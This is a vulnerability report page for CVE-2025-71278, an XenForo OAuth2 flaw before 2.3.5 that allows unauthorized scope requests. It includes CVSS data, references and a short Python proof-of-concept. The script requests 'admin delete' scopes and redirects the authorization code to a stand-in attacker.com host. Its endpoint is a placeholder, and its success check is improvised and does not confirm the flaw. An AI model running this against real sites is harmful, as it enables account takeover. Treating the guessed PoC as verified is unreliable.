Security Vulnerability Report
CVE-2025-71278 CVSS 8.8 HIGH

CVE-2025-71278

Published: 2026-04-01 01:16:40
Last Modified: 2026-04-01 18:51:48

Description

XenForo before 2.3.5 allows OAuth2 client applications to request unauthorized scopes. This affects any customer using OAuth2 clients on any version of XenForo 2.3 prior to 2.3.5, potentially allowing client applications to gain access beyond their intended authorization level.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 (secondary): 8.7 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* - VULNERABLE
XenForo 2.3 < 2.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration (placeholder host; the advisory names no specific endpoint path)
target_url = "https://example.com/oauth2/authorize"
client_id = "vulnerable_client_id"
redirect_uri = "https://attacker.com/callback"

# The vulnerability allows requesting unauthorized scopes.
# Here we attempt to request 'admin' scope which should not be granted.
malicious_scope = "read write admin delete"

params = {
    "client_id": client_id,
    "response_type": "code",
    "redirect_uri": redirect_uri,
    "scope": malicious_scope,
    "state": "random_string_123",
}

print(f"Sending malicious request to: {target_url}")

try:
    # Send the authorization request
    response = requests.get(target_url, params=params, allow_redirects=False)

    # Check if the server accepts the unauthorized scope.
    # A successful exploit often results in a redirect to the callback URL
    # or a 200 OK with the scope approved.
    if response.status_code == 302 and redirect_uri in response.headers.get("Location", ""):
        print("[+] Potential Vulnerability Detected!")
        print(f"[+] Redirect Location: {response.headers['Location']}")
        print("[+] The server may have accepted the unauthorized scope.")
    else:
        print("[-] Attack failed or scope was rejected by the server.")
        print(f"Status Code: {response.status_code}")
except Exception as e:
    print(f"Error occurred: {e}")

References

https://www.vulncheck.com/advisories/xenforo-oauth2-unauthorized-scope-request (Third Party Advisory)
https://xenforo.com/community/threads/xenforo-2-3-5-includes-security-fix-add-ons-released.228812/ (Release Notes)

Raw JSON Data